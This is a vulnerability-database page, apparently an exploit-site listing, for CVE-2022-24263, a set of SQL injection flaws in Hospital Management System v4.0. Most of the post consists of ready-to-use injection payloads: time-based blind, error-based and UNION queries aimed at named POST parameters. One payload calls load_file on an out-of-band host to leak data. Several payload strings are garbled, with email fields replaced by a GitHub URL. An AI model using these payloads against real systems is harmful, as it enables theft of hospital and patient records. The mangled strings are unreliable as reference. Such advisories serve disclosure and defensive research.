Lucene search
Nu11secur1ty1337DAY-ID-37320HistoryFeb 07, 2022 - 12:00 a.m.
Hospital Management System 4.0 SQL Injection Vulnerability
2022-02-0700:00:00
nu11secur1ty
0day.today
198
0.114 Low
EPSS
Percentile
95.2%
Hospital Management System version 4.0 suffers from multiple remote SQL injection vulnerabilities. Original discovered of SQL injection in this version is attributed to Metin Yunus Kandemir in January of 2020.
## Title: Hospital Management System v4.0 Multiple SQL-Injections
## Author: nu11secur1ty
## Vendor: https://github.com/kishan0725
## Software: https://github.com/kishan0725/Hospital-Management-System
## CVE-2022-24263
## Description:
The Hospital Management System v4.0 is suffering from Multiple
SQL-Injections via three parameters in function.php, contact.php, and
func3.php applications.
The attacker can be receiving the all information from the system by
using this vulnerability, and also the malicious actor can use
sensitive information from the customers of this system.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: txtName (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtName=821761' AND (SELECT 9346 FROM
(SELECT(SLEEP(3)))HJGv) AND
'xkCZ'='xkCZ&txtEmail=xst[email protected]://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select
load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send
Message&txtMsg=441931
---
-------------------------------------------
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: [email protected]://github.com/kishan0725/Hospital-Management-System'+(select-2936)
OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN
1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: [email protected]://github.com/kishan0725/Hospital-Management-System'+(select-2730)
UNION ALL SELECT
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
---
-------------------------------------------
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY
CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0
END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT
CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263)
## Proof and Exploit:
[href](https://streamable.com/m4hnm1)
Related
prion
prion
Sql injection
2022-01-31 22:15:00
packetstorm
packetstorm
Hospital Management System 4.0 SQL Injection
2022-02-07 00:00:00
cvelist
cvelist
CVE-2022-24263
2022-01-31 21:27:00
cve
cve
CVE-2022-24263
2022-01-31 22:15:07
nvd
nvd
CVE-2022-24263
2022-01-31 22:15:07
exploitdb
exploitdb
Hospital Management System 4.0 - 'multiple' SQL Injection
2022-02-08 00:00:00